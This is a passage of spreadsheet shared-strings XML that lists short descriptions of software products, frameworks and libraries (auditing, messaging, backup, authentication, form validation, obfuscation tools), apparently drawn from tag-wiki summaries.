    <t>Audit4j is an open source auditing framework and specifically designed to capture audit events generated and triggered from various components throughout the enterprise applications.</t>
  </si>
  <si>
    <t>Features include:
Point-to-Point and publish-subscribe messaging models
Guaranteed delivery of messages
Synchronous and asynchronous message delivery
Persistence using JDBC
Local transactions
Message filtering using SQL92-like selectors
Authentication
Administration GUI
XML-based configuration files
In-memory and database garbage collection
Automatic client disconnection detection
Applet support
Integrates with Servlet containers such as Jakarta Tomcat
Support for TCP, RMI, HTTP and SSL protocol stacks
Support for large numbers of destinations and subscribers
http://openjms.sourceforge.net/index.html</t>
  </si>
  <si>
    <t>STORE operations have a bit more complicated rationale as WRITE-BACK, WRITE-THROUGH and similar strategies try to both save some time by block-operations and to facilitate STORAGE-side integrity of data content in { concurrent | [PARALLEL]} multi-PROCESSOR arrangements.</t>
  </si>
  <si>
    <t>Some of the main features of Percona XtraBackup are:
Create hot InnoDB backups without pausing your database
Make incremental backups of MySQL
Stream compressed MySQL backups to another server
Move tables between MySQL servers on-line
Create new MySQL replication slaves easily
Backup MySQL without adding load to the server</t>
  </si>
  <si>
    <t>These SDK gives your application the full functionality of Microsoft's identity platform, including industry standard protocol support for OAuth2, Web API integration with user level consent, and two factor authentication support.</t>
  </si>
  <si>
    <t>Although it is stated as mini framework, it supports a wide range of web application development features:
Datatase access API
Security control
URL routing
Validation helpers
Internationalization &amp; Localization
User authentication &amp; authorization API
Ajax
License
MIT
Resources
PDF Cookbook
API Documentation
Community Forum
GitHub issues
Roadmap</t>
  </si>
  <si>
    <t>STORE operations have a bit more complicated rationale as WRITE-BACK, WRITE-THROUGH and similar strategies try to both save some time by block-operations and to facilitate STORAGE-side coherence and integrity of data content in { concurrent | [PARALLEL]} multi-PROCESSOR arrangements.</t>
  </si>
  <si>
    <t>Benefits 
Cluster Management Made Easy
Flexible Scheduling 
Performance at Scale 
Security 
Extensible 
For more details click here</t>
  </si>
  <si>
    <t>It ships with facilities for authenticating
  using HTTP basic or digest authentication, interactive form login or
  X.509 certificate login, but also allows you to implement your own
  authentication strategies.</t>
  </si>
  <si>
    <t>Functionality includes routing, model update/validation, authentication/authorization, content caching with dependency, xsrf/resubmission protection, AJAX+JSON, i18n (gettext), middlewares, and more.</t>
  </si>
  <si>
    <t>Management Tools
Streamline configuration and setup, take advantage of multi-cloud agility
Built-in enterprise-grade security for the full stack
Easily enable cross datacenter replication between clusters through a convenient UI
Useful links
Couchbase Server
Couchbase Mobile
Couchbase SDKs
Couchbase Forums
Couchbase Events
Couchbase Blog
Couchbase Community Directory
Couchbase Community Meetups
Altoros NoSQL Performance Benchmark</t>
  </si>
  <si>
    <t>It features a strong through-the-web development model, allowing you to update your web site from anywhere made possible by a tightly integrated security model.</t>
  </si>
  <si>
    <t>View models may contain specific validation rules using data annotations or IDataErrorInfo.</t>
  </si>
  <si>
    <t>Main Features and Benefits:
Mobile data integration - Connectivity and authentication APIs
Security features - On-device encryption, offline authentication and remote disablement of apps
Cross-platform support - Runtime Skins, UI abstractions and HTML5 toolkits compatibility
Mobile client functionality - Hybrid app framework, access to device APIs and push notification registration
Mobile database for large offline data sets storage with robust encryption and advanced back-end synchronization.</t>
  </si>
  <si>
    <t>empower your site visitors to edit high quality video and audio
integrate with your existing authentication and storage mechanisms
customize the user interface, workflow and available media
Official Github: https://github.com/moviemasher/angular-moviemasher</t>
  </si>
  <si>
    <t>To learn more about Firebase's security rules, see:
the Firebase Database documentation for Security &amp; Rules
the Firebase Storage documentation for Security &amp; Rules
the Cloud Firestore documentation for Security &amp; Rules
Related tags
firebase
firebase-database
firebase-storage
google-cloud-firestore</t>
  </si>
  <si>
    <t>Devise is built as a Rails engine and is a full-featured drop-in solution that comes with a complete set of controllers and views to support features such as user registration, user password recovery, user authentication, user email verification and many more.</t>
  </si>
  <si>
    <t>From the Cloudera Navigator Product Page:
Cloudera Navigator is the only complete data governance solution for Hadoop, offering critical capabilities such as data discovery, continuous optimization, audit, lineage, metadata management, and policy enforcement.</t>
  </si>
  <si>
    <t>Starting with Windows 10, version 1709, DISM has the ability to capture, deploy, and service FFUs, with the following limitations:
The drive that an FFU is applied to has to be the same or larger than
the drive it is captured from
FFU captures of encrypted disks are not supported
Captures of disks that have Volume Shadow Copy Service (VSS) enabled
are not supported
Splitting compressed FFUs is not supported</t>
  </si>
  <si>
    <t>What is new:
Eloquent  Relationship
Auto-Discovery Of Model Policies
PSR-16 Cache Compliance
Multiple Broadcast Authentication Guards
Token Guard Token Hashing
Improved Email Validation
Default Scheduler Timezone
Intermediate Table / Pivot Model Events
Artisan Call Improvements
Mock / Spy Testing Helper Methods
Eloquent Resource Key Preservation
Higher Order orWhere Eloquent Method
Artisan Serve Improvements
Blade File Mapping
DynamoDB Cache / Session Drivers
Carbon 2.0 Support
Pheanstalk 4.0 Support
Resources:
Release notes about 5.8
Upgrade guide for 5.8
Framework API</t>
  </si>
  <si>
    <t>For further information you can check Scott Gu's blog post: 
http://weblogs.asp.net/scottgu/archive/2010/01/15/asp-net-mvc-2-model-validation.aspx
There is a expansion called "DATA ANNOTATIONS EXTENSIONS" for other custom validation types such as CreditCard, min-max integer value etc.</t>
  </si>
  <si>
    <t>Benefits of using Datalogics PDF Java Toolkit :
Developed by Adobe and brought to market by Datalogics so developers
can build applications that are interoperable with Adobe products
Unparalleled form support - import, export, run format or calculation
scripts, and barcode generation
Manage digital signatures - create signature fields, sign existing fields, or verify signatures
Redact and sanitize - remove sensitive data from your documents including hidden text, bookmarks, annotations, and metadata
Simplified document creation - create text based PDFs without worrying about line, paragraph, or page breaks
Resources
Datalogics PDF Java Toolkit Documentation
Samples for Datalogics PDF Java Toolkit on GitHub
Datalogics Home page</t>
  </si>
  <si>
    <t>Attivio's search engine is formally named Attivio Active Intelligence Engine, and provides functionality similar to Apache Solr, but also provides a built in ingestion pipeline and the ability to perform joins search queries (patented technology).</t>
  </si>
  <si>
    <t>Best for: enhanced ecommerce tracking, compliance or security requirements, advanced analytics, AB testing, User Feedback Loops, or other custom configurations.</t>
  </si>
  <si>
    <t>For Cloud Storage, the rules can also be used for data validation, including validating file name and path as well as file metadata properties such as content type and size.</t>
  </si>
  <si>
    <t>Oracle's Mobile Application Framework (MAF) is a hybrid mobile framework which leverages Java, HTML5 and JavaScript to deliver a complete MVC framework with declarative user interface definition, device features integration and built-in security.</t>
  </si>
  <si>
    <t>Java EE applications include: Enterprise Java beans (EJB) applications for distributed, secure applications with transactional support, Java Persistence API (JPA) applications to access persistent data, and JavaServer Pages (JSP) or JavaServer Faces (JSF) for developing presentation logic.</t>
  </si>
  <si>
    <t>The core of Tryton (also called Tryton kernel) provides all the necessary functionalities for a complete application framework: data persistence, extensive modularity, users management (authentication, fine grained control for data access, handling of concurrent access of resources), workflow and report engines, web services and internationalisation.</t>
  </si>
  <si>
    <t>Formik is a small react form library that helps you with the 3 most annoying parts:
Getting values in and out of form state
Validation and error messages
Handling form submission
By colocating all of the above in one place, Formik will keep things organized, making testing, refactoring, and reasoning about your forms a breeze.</t>
  </si>
  <si>
    <t>Analysis Services fully supports XML for Analysis 1.1, and also provides extensions to support metadata management, session management, and locking capabilities.</t>
  </si>
  <si>
    <t>Well-defined, comprehensive, versatile but still minimal interfaces are critical for reliability, extensibility, maintainance, and compatibility.</t>
  </si>
  <si>
    <t>Taken from glitch.com/about:
Here's what else Glitch provides:
Instant deployment
  Automatic hosting on a secure URL
  Visual version control
  CDN for assets
  Secure storage of secrets and credentials
  The ability to help each other with code problems in real-time
  One-click licenses and codes of conduct
  Full console access
  GitHub import and export
  Custom profiles and team pages
  Embeds
  Server-side debugger
  Complete code portability - no proprietary protocols or libraries</t>
  </si>
  <si>
    <t>An extensible framework to audit executing operations in .NET including support for .NET Framework 4.5 and Net Core.</t>
  </si>
  <si>
    <t>These computers should be able to submit captured images and metadata to cloud file storage once a day (e.g., Google Cloud Storage) 
How would you organize such system in terms of security, key storage, protocols, etc?</t>
  </si>
  <si>
    <t>Form validation jQuery plugin that allows you to validate data in popular frameworks (Bootstrap, Foundation ,Pure, Semantic UI, UIKit)</t>
  </si>
  <si>
    <t>IntelliLock combines strong license security, highly adaptable licensing functionality/schema with reliable assembly protection.</t>
  </si>
  <si>
    <t>Specific features for high-performance encryption in multi-processor/multi-core systems.</t>
  </si>
  <si>
    <t>Most scripting languages support features such as:
dynamic typing
direct invocation of external commands
direct interaction with the file system
basic string processing
error control
Scripting languages are traditionally used for common system administration tasks like backups, and software installation and configuration.</t>
  </si>
  <si>
    <t>It includes profile support, OAuth integration, works with OWIN, and is included with the ASP.NET templates shipped with Visual Studio 2013.
link http://www.asp.net/identity</t>
  </si>
  <si>
    <t>Kubernetes support
Kubernetes in Docker EE fully supports all Docker EE features, including role-based access control, LDAP/AD integration, scanning, signing enforcement, and security policies.</t>
  </si>
  <si>
    <t>Standard features include:
Clustering
Distributed caching
Adaptive health Monitoring
Caucho quercus is Cauchos implementation of PHP written in Java to improve performance, scalability and security of PHP applications
Caucho hessian is a fast, compact, binary protocol that not only outperforms XML-based remoting protocols like SOAP and XML-RPC but also meets or exceeds the performance of other binary protocols like ORMI and Java JNI</t>
  </si>
  <si>
    <t>&gt;&gt; Get started with Azure AD B2C
Features
Email-based or username-based local accounts
Social identity providers (Facebook, Google, Microsoft and more)
Custom identity providers (OpenID Connect, SAML and more)
Built-in user journeys (sign up/sign in, edit profile, password reset) 
Custom user journeys
Built-in and custom user attributes
Configurable application claims
User interface customization
Multi-factor authentication
Posting Azure AD B2C questions in Stack Overflow
The following tips will help you get quicker/better answers when posting Azure AD B2C questions:
Make sure you first check out the existing Azure AD B2C resources: code samples | documentation | feedback forum
When dealing with an error, include as many details about the error, including the correlation id and the AADB2CXXXX error code.</t>
  </si>
  <si>
    <t>The API is designed to preserve the syntax and power of SQL as much as possible, but also to:
Support multiple database servers easily
Allow developers to leverage more complex functionality, such as transactions
Provide a structured interface for the dynamic construction of queries
Enforce security checks and other good practices
Provide modules with a clean interface for intercepting and modifying a site's queries
Further resources
The documentation automatically extracted from the source comments</t>
  </si>
  <si>
    <t>.NET Reactor is a powerful code protection and software licensing system for software written for the .NET Framework, and supports all languages that generate .NET assemblies</t>
  </si>
  <si>
    <t>Oracle MAF key concepts
Visual and declarative development 
Mobile optimized user experience
Simplified access to device services
Code in Java and run on multiple mobile OSs
Offline support using encrypted SQLite
Built-in security for authentication, authorization and encryption
support
Oracle MAF Architecture
More information can be found here: http://www.oracle.com/technetwork/developer-tools/maf/overview/index.html</t>
  </si>
  <si>
    <t>WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.</t>
  </si>
  <si>
    <t>It uses Kerberos for authentication and supports several interesting features that are not common in other distributed file systems: full client-transparent location independence of files (admins can move AFS volumes from one file server to another with no user-visible downtime), extensive client-side caching, a uniform world-wide namespace, and good performance on long-distance network links.</t>
  </si>
  <si>
    <t>WebSEAL provides the following features:
Supports multiple authentication methods
Both built-in and plug-in architectures allow flexibility in supporting a variety of authentication mechanisms.</t>
  </si>
  <si>
    <t>There are many editions of SQL Server 2016:
1- Entreprise Edition : Comprehensive, mission-critical in-memory performance with unparalleled security, mission critical high availability, an end-to-end enterprise business intelligence solution with mobile BI built in, in-database advanced analytics at scale, and unlimited virtualization with software assurance.</t>
  </si>
  <si>
    <t>The preferred (most secure) hashing method supported by phpass is the OpenBSD-style Blowfish-based bcrypt, known in PHP as CRYPT_BLOWFISH, with a fallback to BSDI-style extended DES-based hashes, known in PHP as CRYPT_EXT_DES, and a last resort fallback to MD5-based salted and variable iteration count password hashes implemented in phpass itself (also referred to as portable hashes).</t>
  </si>
  <si>
    <t>Azure SQL Database provides predictable performance, scalability, business continuity, data protection, and near-zero administration for cloud developers.</t>
  </si>
  <si>
    <t>Envers adds powerful audit trail capabilities integrated with NHibernate.</t>
  </si>
  <si>
    <t>There are several middleware included in the Laravel framework, including middleware for maintenance, authentication, CSRF protection, and more.</t>
  </si>
  <si>
    <t>Supported Methods
Most payment gateways support the following methods:
Authorize
Capture
Purchase (Combined Authorize &amp; Capture)
Refund
At this stage there is no support for recurring payments or token billing.</t>
  </si>
  <si>
    <t>Sonatype maintains large databases about popularity and age as well as security and license issues and characteristics of all the components in the Central Repository and offers tools to integrate all this information into the software development lifecycle in a manner equivalent to supply chain management in manufacturing.</t>
  </si>
  <si>
    <t>It provides the following features:
Auto-generation of editing and presentation views
Registration of content types with the CMF tools
Easy installation of the generated content objects
Configurability of CMF actions
Basic storage transparency
Unique IDs
References
Basic security bootstrap 
Useful links:
http://plone.org/products/archetypes</t>
  </si>
  <si>
    <t>jSignature is a JavaScript widget (a jQuery plugin) that simplifies creation of a signature capture field in a browser window, allowing a user to draw a signature using mouse, pen, or finger.</t>
  </si>
  <si>
    <t>Using HTML5 Validation, developers can attach validation constraints directly to the input element, and these elements will be validated prior to form submission.</t>
  </si>
  <si>
    <t>It doesn't force you to use any specific validation scheme, and provides flexible and efficient relation/nested-relation loading, and first class transaction support.</t>
  </si>
  <si>
    <t>Pdftk can
Merge PDF Documents
Split PDF Pages into a New Document
Rotate PDF Pages or Documents
Decrypt Input as Necessary (Password Required)
Encrypt Output as Desired
Fill PDF Forms with FDF Data or XFDF Data and/or Flatten Forms
Apply a Background Watermark or a Foreground Stamp
Report on PDF Metrics such as Metadata, Bookmarks, and Page Labels
Update PDF Metadata
Attach Files to PDF Pages or the PDF Document
Unpack PDF Attachments
Burst a PDF Document into Single Pages
Uncompress and Re-Compress Page Streams
Repair Corrupted PDF (Where Possible)</t>
  </si>
  <si>
    <t>Restbed is a comprehensive and consistent programming model for building applications that require seamless and secure communication over HTTP, with the ability to model a range of business processes, designed to target mobile, tablet, desktop and embedded production environments.</t>
  </si>
  <si>
    <t>Its rich interface simplifies complex cloud deployments by automating the creation, scaling, clustering and security updates of microservices or monolithic applications.</t>
  </si>
  <si>
    <t>Done
default-libmysqlclient-dev/stable,now 1.0.2 armhf [installed]
  MySQL database development files (metapackage)
libcrypt-mysql-perl/stable 0.04-6+b2 armhf
  Perl module to emulate the MySQL PASSWORD() function
libglpk40/stable 4.61-1 armhf
  linear programming kit with integer (MIP) support
libmariadbclient-dev-compat/stable,now 10.1.37-0+deb9u1 armhf [installed,automatic]
  MariaDB database development files (libmysqlclient compatibility)
the default-libmysqlclient-dev is not a linkable library.</t>
  </si>
  <si>
    <t>ROSE is particularly well suited for building custom tools for static analysis, program optimization, arbitrary program transformation, domain-specific optimizations, complex loop optimizations, performance analysis, and cyber-security."</t>
  </si>
  <si>
    <t>Unobtrusive Validation is a jQuery plugin written by Microsoft that acts as a support library for jQuery and the jQuery Validate plugin.</t>
  </si>
  <si>
    <t>MuPDF's implementation of PDF-1.7 features is rather complete: it supports transparency, encryption, hyperlinks, annotations, searching and more.</t>
  </si>
  <si>
    <t>Validation of forms, controls, models using various angular validation directives.</t>
  </si>
  <si>
    <t>Validation of forms, controls, models using various Angular 2+ validation directives.</t>
  </si>
  <si>
    <t>The specification suite seeks to build upon experience with existing schemas and deployments, placing specific emphasis on simplicity of development and integration, while applying existing authentication, authorization, and privacy models.</t>
  </si>
  <si>
    <t>Microsoft SQL Server 2008 Express is a powerful and reliable data management system that delivers a rich set of features, data protection, and performance for embedded application clients, light Web applications, and local data stores.</t>
  </si>
  <si>
    <t>It has plenty of validation rules out of the box and support for custom ones as well.</t>
  </si>
  <si>
    <t>X-Pack is an Elastic Stack extension that bundles security, alerting, monitoring, reporting, and graph capabilities into one easy-to-install package.</t>
  </si>
  <si>
    <t>It includes multiple out-of-the-box integration and authentication adapters for integrating with SOAP and RESTful API's, AWS, social media, relational databases, MongoDB, OpenAPI, RAML, Oauth, SAML, LDAP, as well as enterprise-grade third-party solutions such as MQ, SAP, Salesforce or MuleSoft, among others.</t>
  </si>
  <si>
    <t>Not enforcing referential integrity
Your database may vary here, but if your database supports referential integrity - meaning that all foreign keys are guaranteed to point to an entity that exists - you should be using it.</t>
  </si>
  <si>
    <t>Features
Fast
Lightweight
Maintains persistent server connections
Keeps connection count on the backend caching servers low
Enables pipelining of requests and responses
Supports proxying to multiple servers
Supports multiple server pools simultaneously
Shard data automatically across multiple servers
Implements the complete memcached ascii and redis protocol
Easy configuration of server pools through a YAML file
Supports multiple hashing modes including consistent hashing and distribution
Can be configured to disable nodes on failures
Observability through stats exposed on stats monitoring port
Works with Linux, *BSD, OS X and Solaris (SmartOS)
Resources
Twitter Blog Article
GitHub</t>
  </si>
  <si>
    <t>Specifically, our contributions are: the
unikernel approach to providing sealed single-purpose appliances,
particularly suitable for providing cloud services; evaluation of
a complete implementation of these techniques using a functional
programming language (OCaml), showing that the benefits of type-safety need not damage performance; and libraries and language
extensions supporting systems programming in OCaml.</t>
  </si>
  <si>
    <t>It enables apps to integrate with the Windows shell and cooperate with other apps via a declarative extension mechanism, and exposes an explicit permissions-based security model (known as "capabilities") to provide isolation and protect users' privacy.</t>
  </si>
  <si>
    <t>Offers operational intelligence capabilities, smart management of metadata and metadata imports, and parallel debugging capabilities to help enhance productivity when working with partitioned data.</t>
  </si>
  <si>
    <t>Enterprise Library 6 contains the following: 
Data Access Application Block 
Exception Handling Application Block 
Logging Application Block 
Validation Application Block 
Policy Injection Application Block 
Unity Dependency Injection Container
Semantic Logging Application Block (SLAB)
Transient Fault Handling Application Block ("Topaz")
Sites
Microsoft Enterprise Library
(MSDN, all released resources)
Microsoft Enterprise Library
(Codeplex, work-in-progress, preview releases, discussion forum)
Enterprise Library Community Extensions
(Codeplex)
Hands-on Labs 
Books
Developer's Guide to Microsoft Enterprise Library 6
Dependency Injection with Unity
Developer's Guide to Microsoft Enterprise Library 5.0
The Definitive Guide to the
Microsoft Enterprise Library  By
Keenan Newton</t>
  </si>
  <si>
    <t>Pervasive PSQL Database is now known as Actian Zen Embedded Database and now also includes support for IOT.</t>
  </si>
  <si>
    <t>Database administration is the umbrella term for a wide range of database-related activities, ranging from installation and configuration, to stability monitoring, performance finetuning and security auditing.</t>
  </si>
  <si>
    <t>It offers global transaction IDs to support failover, flexible transaction filtering, extensible transaction metadata, sharding, multiple replication services per process, high performance, and simple, well-documented operation.</t>
  </si>
  <si>
    <t>Notable changes:
Scanners no longer access the database
Enhanced monitoring
Better issue management
Improved UI for global admin
Design related features were dropped</t>
  </si>
  <si>
    <t>jQuery validation engine is a Javascript plugin aimed at the validation of form fields in the browser (IE 6-8, Chrome, Firefox, Safari, Opera 10).</t>
  </si>
  <si>
    <t>The service combines the performance and scalability of Google's cloud with advanced security and sharing capabilities.</t>
  </si>
  <si>
    <t>It includes several protection and performance enhancements such as Search Advisor, Performance Optimizer and PHOTON technology.</t>
  </si>
  <si>
    <t>Therefore, like with HTML4, you need to also validate input constraints on the server side, in a way that is consistent with what is done on the client side.</t>
  </si>
  <si>
    <t>Since it should be accessible from more than one application, embedded databases like SQLite would not work, thus it should be a standalone database (I know that SQLite databases can be read by more than one process at the same time, but I'm mostly doing write-operations which would lead to many locks on the file).</t>
  </si>
  <si>
    <t>These back-end services provide clients with a way to query, insert, update, and delete business data as required while enforcing appropriate business rules such as input validators.</t>
  </si>
  <si>
    <t>Ships with a convenient reusable library in Python
Respects and encourages proper use of HTTP (status codes, ...)
Has built in (optional) form validation (via Django), throttling, etc.</t>
  </si>
  <si>
    <t>Cloud Storage for Firebase supports:
Robust uploads and downloads in the background, regardless of network quality
Secure client-side authorization, integrated with Firebase Authentication
Petabyte scale data storage backed by Google Cloud Storage
API access throughout Firebase or Google Cloud Storage APIs 
Related tags
firebase
firebase-authentication
firebase-security
firebase-database</t>
  </si>
  <si>
    <t>Add custom validation logic that runs both on the
server and on the client, either by subclassing an existing rule or
by referencing a custom JavaScript function
How to use xVal
For more information, and to see a quick tutorial, see this blog post.</t>
  </si>
  <si>
    <t>Chart FX is a commercial package to create visually-rich, lightweight and secure charts that will enhance your enterprise application's display layer.</t>
  </si>
  <si>
    <t>Qsys captures system-level hardware designs at a high level of abstraction and automates the task of defining and integrating customized HDL components, which may include IP cores, verification IP, and other design modules.</t>
  </si>
  <si>
    <t>The strengths of Plone are its flexible and adaptable workflow, very good security, extensibility, high usability and flexibility.</t>
  </si>
  <si>
    <t>BootstrapValidator is the jQuery plugin to validate form fields, designed to use with Bootstrap 3, developed by nghuuphuoc</t>
  </si>
  <si>
    <t>Unity) is a lightweight, extensible dependency injection container for .NET with support for interception.</t>
  </si>
  <si>
    <t>NHibernate Validator is a powerful and extensible framework to validate objects using the .Net Platform.</t>
  </si>
  <si>
    <t>Validation Engine is a jQuery plugin for validating form inputs in the browser.</t>
  </si>
  <si>
    <t>Unobtrusive Validation refers to a jQuery plugin created by Microsoft used in conjunction with the jQuery Validate plugin.</t>
  </si>
  <si>
    <t>Features include:
Built-in support for various authentication, permissions, versioning, throttling and other API policies.</t>
  </si>
  <si>
    <t>A validation plugin for Backbone.js that validates both your model as well as form input
http://thedersen.com/projects/backbone-validation</t>
  </si>
  <si>
    <t>Optional LDAP/Active Directory integration
Optional User Registration
Password and TOTP support (via Google Authenticator).</t>
  </si>
  <si>
    <t>Data security within Hadoop needs to evolve to support multiple use cases for data access, while also providing a framework for central administration of security policies and monitoring of user access.</t>
  </si>
  <si>
    <t>According to Microsoft, security, ease of use, and improvements in RSS, Cascading Style Sheets, and Ajax support were its priorities for IE8.</t>
  </si>
  <si>
    <t>Some of the feature highlights of are:
Password reset improvements
Favicon Management
Multisite Focused Changes
Editor improvements
For Developers:
Fast previewing changes to Menus in the Customizer
Changes to Customizer Panels and Sections
New Customizer Media Controls
PHP4 style constructors are deprecated
Resources
Release Notes for version 4.3
Official Website</t>
  </si>
  <si>
    <t>Some examples include:
Rename Obfuscation
String Encryption
Control Flow Obfuscation
Unused Code and Metadata Removal
Binary Linking/Merging
Dummy Code Insertion
Instruction Pattern Transformation
Opaque Predicate Insertion
Anti-Tamper Wrapping
Anti-Debug Wrapping
Application Expiration
Watermarking
Security Alerts
Custom Response to Tamper or Debugging
There is also a Visual Studio Team Services (VSTS) build extension for Dotfuscator Community Edition (CE), available in the VSTS Marketplace.</t>
  </si>
  <si>
    <t>Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform.</t>
  </si>
  <si>
    <t>Docker support for automatic registration of running containers
Cluster support that enables automatic multithreading.</t>
  </si>
  <si>
    <t>They can be used to perform administrative tasks in the database such as auditing and regulating database operations.</t>
  </si>
  <si>
    <t>This release adds support for Windows Store apps as well as the registration by convention feature to ease the task of configuring Unity.</t>
  </si>
  <si>
    <t>Because it is un-opinionated it gives the developer a lot of choice in how to handle various aspects - such as sessions, authentication, authorization and more - without sacrificing support for those aspects or out-of-box ease of use.</t>
  </si>
  <si>
    <t>Use licensing instead of gpl for on-topic posts related to: 
programming licensing servers
programming licensing clients
implementing consumption of license keys</t>
  </si>
  <si>
    <t>Without database versioning, accountability for who edited the database will be invisible and users committing fraudulent edits to the database can cover their tracks easily by making additional edits.</t>
  </si>
  <si>
    <t>PayJunction powers mid- to large-scale businesses with smart payment processing, electronic signature capturing, and comprehensive multi-user multi-location reporting.</t>
  </si>
  <si>
    <t>Hooks for tax/shipping calculations and payment gateways
Sale pricing
Promotional discount codes
PDF invoice generation (for packing slips)
Stock control
Product popularity
Thumbnail generation
Built-in test suite
Separation of presentation (no embedded markup)
Smart categories (by price range, colour, etc)
Registered or anonymous checkout
Configurable number of checkout steps
Denormalised data for accessiblilty and performance
Authenticated customer accounts with transaction history
Resources
Cartridge documentation
Mezzanine official website
Django project
Python language</t>
  </si>
  <si>
    <t>Key Features:
No BDE; no DLLs
Single-file database
SQL'92 (DDL &amp; DML) support
Compatible with standard and third-party database controls
Single-user and multi-user mode (file-server)
Works great on all versions of Windows - from 98 to Vista, doesn't
require any updates or service packs
Ultra-fast in-memory tables
Unmatched ease-of-use
Strong encryption
BLOB compression
Free for personal use
Full source code available
Royalty-free distribution
Home Page: http://www.componentace.com/absolute_database_features.htm</t>
  </si>
  <si>
    <t>WebSVN offers a view onto your subversion repositories that's been designed to reflect the Subversion methodology.</t>
  </si>
  <si>
    <t>Feature Overview
Resource Management
Actions
Filters
Lenses
Metrics
Custom Tools
Authorization
Custom Fields
Scout Search Integration
Resources
Laravel Nova Website
Documentation</t>
  </si>
  <si>
    <t>Microsoft notes that: "The Fakes Framework in Visual Studio 2012 and 2013 and 2015 is the next generation of Moles &amp; Stubs.</t>
  </si>
  <si>
    <t>These solutions include Policy, Risk, Compliance, Enterprise, Incident, Vendor, Threat, Business Continuity and Audit Management.</t>
  </si>
  <si>
    <t>The modules include:
User Management 
Email based trouble Ticket System, 
(Integrated
voxel.net's ticketsmith) 
Client/Company Management 
Project listings
Hierarchical Task List 
File Repository 
Contact List 
Calendar
Discussion Forum 
Resource Based Permissions
It can import files from MS project and its license allows further modifications.</t>
  </si>
  <si>
    <t>Easy connections / configuration
Well-designed signatures
Improvements to the MongoDB APIs (eg:  supports the update signature style)
Auto-casting of _id in queries
Builds on top of mongoskin
Allows to set global options or collection-level options for queries.</t>
  </si>
  <si>
    <t>Digestive Functors is a form library that provides the following features:
Highly composable (smaller forms can be used to compose larger forms)
Error handling (when the submitted data is invalid, the form is populated with the submitted data along with information about the error)
No assumptions about your markup
Digestive Functors can also be used to validate JSON objects via digestive-functors-aeson
External Resources:
Hackage information for Digestive Functors
Github Repo</t>
  </si>
  <si>
    <t>Vosao CMS features include:
internationalization, 
friendly URLS, 
liking and sharing pages, 
commenting (with moderation), 
content versioning, 
input forms, 
captcha, 
Google Analytics, 
Alias URLs (for SEO), 
optional plugins, 
security and group management, 
parent/child page structure, 
nested and programmable templates, 
site import/export, 
resource management,  
multiple editing modes (visual, wiki syntax, plain text) and more, 
free hosting on the Google cloud.</t>
  </si>
  <si>
    <t>Features
Simple, thread-safe and non-blocking API,
No additional software required,
Supports multiple platforms (Windows, Linux, Mac OS, etc) and various architectures (32-bit, 64-bit, ARM),
Get images from build-in or USB-connected PC webcams,
Get images from IP / network cameras (as MJPEG or JPEG),
Offers ready to use motion detector,
All required JARs Available in Maven Central,
Offers possibility to expose images as MJPEG stream,
It is available as Maven dependency or standalone ZIP binary (with all dependencies included),
Swing component to display video feed from camera,
Swing component to choose camera (drop down),
Multiple capturing frameworks are supported:
OpenIMAJ,
LTI CIVIL,
Java Media Framework (JMF),
Freedom for Media in Java (FMJ),
OpenCV via JavaCV,
VLC via vlcj,
GStreamer (0.10.x only) via gstreamer-java
MJPEG IP Cameras
For more Information, see the projects Github page.</t>
  </si>
  <si>
    <t>Signal tracing (dataflow) analysis
Code coverage analysis
Functional coverage analysis
Project file management
ModelSim integrates these features in a single configurable GUI, however, it can also be scripted via the Tcl language and controlled through command-line parameters which allows for automation of simulation and verification tasks.</t>
  </si>
  <si>
    <t>Server-side API for manipulating files - in more complex scenarios you can save the uploaded files with server-side code and still benefit from the integrated file validation.</t>
  </si>
  <si>
    <t>But it will require a license on the server's side for the user to connect (VS Team basic license, MSDN subscription or TFS Client Access License).</t>
  </si>
  <si>
    <t>plperl uses a restricted subset of the full perl language functionality to enable a more security aware set of the perl language features for use within PostgreSQL.</t>
  </si>
  <si>
    <t>It has following benefits:
Reliable and quick backup
Uninterrupted transaction processing during backups
Savings on disk space and network bandwidth
Automatic backup verification
Higher uptime due to faster restore time
Percona XtraBackup makes MySQL hot backups for all versions of Percona Server, MySQL, MariaDB, and Drizzle.</t>
  </si>
  <si>
    <t>It provides:
Built in support for bonjour broadcasting
IPv4 and IPv6 support
Asynchronous networking using GCD and standard sockets
Password protection support
SSL/TLS encryption support
Extremely FAST and memory efficient
Extremely scalable (built entirely upon GCD)
Heavily commented code
Very easily extensible
WebDAV is supported too!</t>
  </si>
  <si>
    <t>Amazon API Gateway handles all the tasks involved in accepting and processing up to hundreds of thousands of concurrent API calls, including traffic management, authorization and access control, monitoring, and API version management.</t>
  </si>
  <si>
    <t>However, WHMCS has expanded to support additional integration with other web hosting control panels, and it now includes support for a wide range of control panels, payment gateways and other third party software.</t>
  </si>
  <si>
    <t>The namingContext, supported versions of the protocol, supported features and supported controls (operation semantics modifiers) and other information can be discovered by querying the root DSE, though the information might be protected by access controls.</t>
  </si>
  <si>
    <t>Contiki is used in a wide variety of IoT systems, such as city sound monitoring, street lights, networked electrical power meters, industrial monitoring, radiation monitoring, construction site monitoring, alarm systems, and remote house monitoring.</t>
  </si>
  <si>
    <t>Automatic metrics, logs, and traces for all traffic within a cluster, including cluster ingress and egress.</t>
  </si>
  <si>
    <t>Integrated validation  For URL and query-parameters, able to re-use existing JSF validator objects.</t>
  </si>
  <si>
    <t>WHMCS features automated signups for web hosting customers, automatic invoicing and payment processing in multiple currencies, account provisioning, domain registration and management, as well as a fully featured web ticketing and support system for end users.</t>
  </si>
  <si>
    <t>A full example with the most used functions
Set Validation Rules
Set a relation
Set upload field
Set a relation n-n
Add a custom action control
Other examples</t>
  </si>
  <si>
    <t>The WSO2 Governance Registry is an enterprise-grade, lean, component-based, 100% open source, SOA-integrated registry-repository offered under Apache license 2.0.</t>
  </si>
  <si>
    <t>Here are a few features:
Compatible with any version of Hadoop
Easy to use web UI
Simple web and http workflow uploads
Project workspaces
Scheduling of workflows
Modular and pluginable
Authentication and Authorisation
Tracking of user actions
Email alerts on failure and successes
SLA alerting and auto killing
Retrying of failed jobs 
http://azkaban.github.io</t>
  </si>
  <si>
    <t>User Event SuiteScript  SuiteScript can be used to enforce data validation and business rules.</t>
  </si>
  <si>
    <t>The Validator plugin offers automatic form validation configurable via mostly HTML5 standard attributes.</t>
  </si>
  <si>
    <t>With this SDK, you can:
Use Database.com to store your application data
